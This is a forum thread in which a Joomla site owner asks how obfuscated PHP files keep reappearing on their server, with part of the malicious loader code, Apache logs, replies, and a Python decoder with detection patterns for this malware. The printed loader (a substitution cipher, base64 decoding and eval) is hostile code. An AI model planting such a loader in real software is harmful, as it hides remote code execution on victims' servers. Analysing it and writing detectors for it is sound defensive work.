2016-01-28 36 views
1

My server is vulnerable somewhere and I need some help plugging the hole. PHP files containing base64-encoded code keep appearing on my Joomla site. PHP files containing base64_decode appear on the server.

I was initially blacklisted (kelihos was given as the reason) and found that I had some PHP files with random but friendly, human-looking names (login.php, file.php, alias75.php ...) in the Joomla directory. All the files have the main part of the script after a base64_decode function. Here is an example from a listing of such files:

-rw-r--r-- 1 www-data www-data 155232 Dec 24 18:51 file.php 

Note the date & time. The night before Christmas. It has always been the same - the file shows up this morning at 6 am with a date from December 24. Maybe that is a clue? Below is the actual code snippet:

<?php 
function jqgwuawwjs($rlkr, $fikixpq){$wynuczq = ''; for($i=0; $i < strlen($rlkr); $i++){$wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];} 
$jeb="base64_decode";return $jeb($wynuczq);} 
$ldo = 'dGCoZSRV5id3buS9XQR9iuMT59Xg1zcSKz0Ok0OUZYcOipECsx'. 
'aDIGRDiuS9XQR9X9Xg1PUOk0OUZYcOipECsxaDIYFHiuSH5YE2sGCTICR6ZY2Cb90ayxqmxq7V5iWv'. 

It goes on like this for the next 1900 lines & ends with:

; 
$zmdjyoxo = Array('1'=>'I', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'Z', '4'=>'q', '7'=>'B', '6'=>'0', '9'=>'y', '8'=>'6', 'A'=>'K', 'C'=>'l', 'B'=>'i', 'E'=>'N', 'D'=>'n', 'G'=>'G', 'F'=>'F', 'I'=>'b', 'H'=>'4', 'K'=>'T', 'J'=>'8', 'M'=>'x', 'L'=>'L', 'O'=>'p', 'N'=>'P', 'Q'=>'m', 'P'=>'D', 'S'=>'V', 'R'=>'9', 'U'=>'A', 'T'=>'v', 'W'=>'R', 'V'=>'z', 'Y'=>'W', 'X'=>'c', 'Z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'J', 'e'=>'t', 'd'=>'Q', 'g'=>'s', 'f'=>'j', 'i'=>'X', 'h'=>'U', 'k'=>'O', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'Y', 'u'=>'2', 't'=>'S', 'w'=>'H', 'v'=>'f', 'y'=>'M', 'x'=>'C', 'z'=>'E'); 
eval(jqgwuawwjs($ldo, $zmdjyoxo));?> 

When you change the eval to print, this is what comes out (the code is too large for the body of the message - here is the pastebin link):

http://pastebin.com/xcY3wQs6

I removed all these files from the server, changed the root password, mysql password, joomla password & enabled two-factor authentication for the joomla admin.

I noticed strange behaviour a month ago, but before I could investigate the problem (which is probably related to this) my provider - Host9 - had a catastrophic failure. That left me without a website & mail server from 24.12.15 to 12.1.16 (!). Since then I have a cron job that looks for these php files. Of course, removing them only solves half the problem. The question is, how do these files keep popping up?

I have a VPS: on x86_64

Apache/2.4.7

PHP 5.5.9

Joomla 3.4

Ubuntu Server, Linux 3.13.0-63-generic. 8

The file showed up after 6:00 am, so I am including the apache2 access.log from that time:

61.135.190.71 - - [27/Jan/2016:22:56:31 +0000] "GET/HTTP/1.0" 200 430 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 
208.52.154.243 - - [28/Jan/2016:01:23:44 +0000] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 458 "-" "-" 
::1 - - [28/Jan/2016:02:56:54 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:02:56:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:02:56:56 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:06:43:36 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:06:56:03 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:11:58 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:12:20 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:12:21 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:12:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:12:34 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:13:23 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:13:24 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:13:26 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:26:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:26:31 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:26:32 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:07:29:28 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
78.155.39.214 - - [28/Jan/2016:07:47:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0" 
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=79eab716479466d5c44116323db94bb0 HTTP/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0" 
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=79eab716479466d5c44116323db94bb0&nocache=4147360344ltr HTTP/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0" 
::1 - - [28/Jan/2016:08:03:53 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:08:03:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:08:03:57 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:08:04:01 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:08:04:17 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 
::1 - - [28/Jan/2016:08:04:18 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)" 

Apache2 error.log:

[Mon Jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/ 
[Mon Jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable to stat 
[Mon Jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/ 
[Mon Jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable to stat 
[Tue Jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/ 
[Tue Jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/ 
[Tue Jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] AH00135: Invalid method in request c'\xfdF\x9c\xd8\x02\xb9N\xfa\x8d\xc6J(\x9c\xb0\x04\xa3% 
[Thu Jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] AH00169: caught SIGTERM, shutting down 
[Thu Jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] AH00163: Apache/2.4.7 (Ubuntu) configured -- resuming normal operations 
[Thu Jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] AH00094: Command line: '/usr/sbin/apache2' 
[Thu Jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable to stat 
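The "change eval to print" step above runs the attacker's decoder inside PHP; the same layout (a per-character substitution map in an Array(...) literal applied to a concatenated string, then base64-decoded) can be undone statically, and the traits it leaves are what a cron job or scanner should look for. The following Python is an added example, not code from the original post: SAMPLE is a constructed file in the same layout with a harmless payload and a three-entry map, and all function names are the example's own.

```python
import base64
import re
# Constructed sample in the same layout as the file in the question: harmless payload,
# three-entry substitution map instead of the full alphabet. Not the file from the post.
SAMPLE = r"""<?php
function qwerty($rlkr, $fikixpq){$out = ''; for($i=0; $i < strlen($rlkr); $i++){$out .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];}
$jeb="base64_decode";return $jeb($out);}
$ldo = '12h3aW5m'.
'bygpO3==';
$zmdjyoxo = Array('1'=>'c', '2'=>'G', '3'=>'w');
eval(qwerty($ldo, $zmdjyoxo));?>
"""

# Traits of this family: eval(), the decoder's name hidden in a string literal (so a grep
# for "base64_decode(" with the parenthesis misses it) and a variable function call $var(...).
INDICATORS = {
    "eval_call": re.compile(r"\beval\s*\("),
    "decoder_name_in_string": re.compile(r"""["']base64_decode["']"""),
    "variable_function_call": re.compile(r"\$\w+\s*\(\s*\$\w+"),
}
PAIR_RE = re.compile(r"'(.)'\s*=>\s*'(.)'")  # one 'key'=>'value' entry of the Array(...) map
EVAL_RE = re.compile(r"eval\(\s*\w+\(\s*\$(\w+)\s*,\s*\$(\w+)\s*\)\s*\)")  # eval(f($payload, $map))

def indicators(src):
    """Names of the traits present in a PHP source string (sorted for stable output)."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))

def extract_map(src, var):
    """Parse the Array('k'=>'v', ...) literal assigned to $var into a dict."""
    m = re.search(r"\$%s\s*=\s*Array\((.*?)\);" % re.escape(var), src, re.S)
    if not m:
        raise ValueError("substitution map $%s not found" % var)
    return dict(PAIR_RE.findall(m.group(1)))

def extract_string(src, var):
    """Join the '...'.'...' fragments assigned to $var into one string."""
    m = re.search(r"\$%s\s*=\s*((?:'[^']*'\s*\.?\s*)+);" % re.escape(var), src, re.S)
    if not m:
        raise ValueError("payload string $%s not found" % var)
    return "".join(re.findall(r"'([^']*)'", m.group(1)))

def decode(src):
    """Recover the eval'd payload without running PHP: substitute, then base64-decode."""
    m = EVAL_RE.search(src)
    if not m:
        raise ValueError("no eval(f($payload, $map)) call found")
    payload, table = extract_string(src, m.group(1)), extract_map(src, m.group(2))
    substituted = "".join(table.get(c, c) for c in payload)  # unmapped chars pass through, as in the PHP
    return base64.b64decode(substituted).decode("utf-8", "replace")
```

Run `indicators()` over every .php file under the web root to find candidates, then `decode()` on the hits to see what they would have executed, with no PHP interpreter involved.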
+0

Do you have access to the apache logs? – dev0

+0

If the files keep reappearing, something on the server is compromised that still lets them get into it. Sadly, the easiest way to get rid of this is a clean install with completely different passwords and clean sources. Check everything you copy over –

+0

I just added the relevant parts of the apache2 log files – gygoole

Answer

1

The code appears to be a malicious script and is encoded for protection. I suggest you use a program to remove it.

Try Narnia Guardian, http://github.com/Pilskalns/Narnia-Guardian

Try the resource above to remove these encoded snippets from all your files. It is easy to set up and easy to use. All you need is to be patient.

+1

That does not solve the root of the problem. – dev0

+1

I have to agree. I have a cron job that does that, but it is like having a pump on a leaky boat: good enough until you reach the harbour. – gygoole
